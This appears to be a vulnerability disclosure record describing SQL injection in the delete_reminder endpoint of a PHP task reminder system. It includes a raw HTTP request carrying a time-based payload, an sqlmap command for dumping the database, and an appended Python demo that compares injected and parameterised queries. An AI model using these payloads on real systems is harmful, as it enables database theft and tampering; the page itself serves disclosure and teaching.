Submission #228610: SourceCodester Task Management System sql injection in Master.php

Information

Title: SourceCodester Task Management System sql injection in Master.php
Description: I found a SQL injection vulnerability in the SourceCodester Task Management System (https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html). It affects the file /php-trs/classes/Master.php?f=delete_reminder:

POST /php-trs/classes/Master.php?f=delete_reminder HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/php-trs/admin/?page=reminders/manage_reminder&id=6
Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=v50trgss5tkq84rfr78hjj7g1h
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

user_id=1&title=1&description=1&remind_from=0011-01-01&remind_to=0222-01-01&status=1&id=1'and sleep(4)#

You will then notice that the server's response time has become obviously longer, which proves that our SQL statement was successfully executed. You can then save the request as 1.txt and use sqlmap to inject it. The command is sqlmap -r 1.txt --data="id=1", after which you can successfully dump the database.

The vulnerability arises from the use of the code "UPDATE `reminder_list` set {$data} where id = '{$id}'" without sufficient filtering of the controllable parameter id. This lack of proper filtering exposes the potential for SQL injection attacks. To address this issue, my recommendation is to protect the id parameter against malicious exploitation by using mysqli_real_escape_string().
Source: https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
User: fushuling (UID 45488)
Submission: 26/10/2023 07:01 PM (3 years ago)
Moderation: 26/10/2023 08:21 PM (1 hour later)
Status: Accepted
VulDB Entry: 243644 [SourceCodester Task Reminder System 1.0 Master.php?f=delete_reminder id SQL Injection]
Points: 20
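The report quotes the query template `UPDATE \`reminder_list\` set {$data} where id = '{$id}'` and a payload that ends in `#`, which in MySQL comments out the closing quote the template appends. The following is an added example, not code from the submission or from the Task Reminder System, that reproduces the interpolation pattern, shows how the reported payload lands in the statement, and runs the same UPDATE shape against an in-memory SQLite database both with string interpolation and with a bound parameter. Assumptions: SQLite stands in for MySQL, the `reminder_list` columns and rows are constructed for the demo, and because SQLite has no `sleep()` and does not treat `#` as a comment, the executed payload is a boolean tautology with a `--` comment rather than the time-based one from the report. The hardened form uses a prepared statement with a bound value; the report itself recommends escaping the id.

```python
import sqlite3

# Constructed stand-in for the application's reminder_list table (assumption:
# only the columns needed for the demo are modelled; the real schema is not on the page).
SAMPLE_ROWS = [(1, "pay rent", 0), (2, "renew cert", 0), (3, "rotate keys", 0)]

# Payload quoted in the report. In MySQL, '#' starts a comment, so the single quote
# the template appends after {$id} is commented out and the statement stays valid.
REPORTED_PAYLOAD = "1'and sleep(4)#"

# Equivalent tautology payload for SQLite, which uses '--' for comments and has no sleep().
SQLITE_PAYLOAD = "1' OR 1=1 --"


def render_vulnerable_query(data: str, id_value: str) -> str:
    """Mirror the interpolation pattern quoted in the report:
    UPDATE `reminder_list` set {$data} where id = '{$id}'.
    Returns the SQL text that would reach the database server."""
    return f"UPDATE `reminder_list` set {data} where id = '{id_value}'"


def _fresh_db() -> sqlite3.Connection:
    """Create an in-memory table with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE reminder_list (id INTEGER PRIMARY KEY, title TEXT, status INTEGER)"
    )
    conn.executemany("INSERT INTO reminder_list VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def update_status_vulnerable(conn: sqlite3.Connection, id_value: str, status: int) -> int:
    """Interpolate id into the SQL string as the reported code does.
    Returns the number of rows the UPDATE touched."""
    sql = render_vulnerable_query(f"status = {status}", id_value)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_status_safe(conn: sqlite3.Connection, id_value: str, status: int) -> int:
    """Hardened form: id is sent as a bound parameter, never spliced into SQL text.
    Returns the number of rows the UPDATE touched."""
    cur = conn.execute(
        "UPDATE reminder_list SET status = ? WHERE id = ?", (status, id_value)
    )
    conn.commit()
    return cur.rowcount


def demo() -> dict:
    """Run the same payload through both code paths on fresh copies of the table."""
    results = {}
    # Interpolation: the WHERE clause becomes id = '1' OR 1=1, so every row is updated.
    results["vulnerable_rows"] = update_status_vulnerable(_fresh_db(), SQLITE_PAYLOAD, 1)
    # Bound parameter: the whole payload is compared as one literal, so no row matches.
    results["safe_rows"] = update_status_safe(_fresh_db(), SQLITE_PAYLOAD, 1)
    # Bound parameter with a legitimate id still updates exactly that row.
    results["safe_legit_rows"] = update_status_safe(_fresh_db(), "1", 1)
    return results


if __name__ == "__main__":
    print(render_vulnerable_query("status = 1", REPORTED_PAYLOAD))
    print(demo())
```

Running the block prints the statement the server would receive for the reported payload, with the appended quote sitting after `#`, and then shows three rows changed by the interpolated query against none for the parameterised one. The time-based variant from the report works the same way on MySQL: `sleep(4)` executes inside the `WHERE` clause for every candidate row, which is why the response is delayed.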
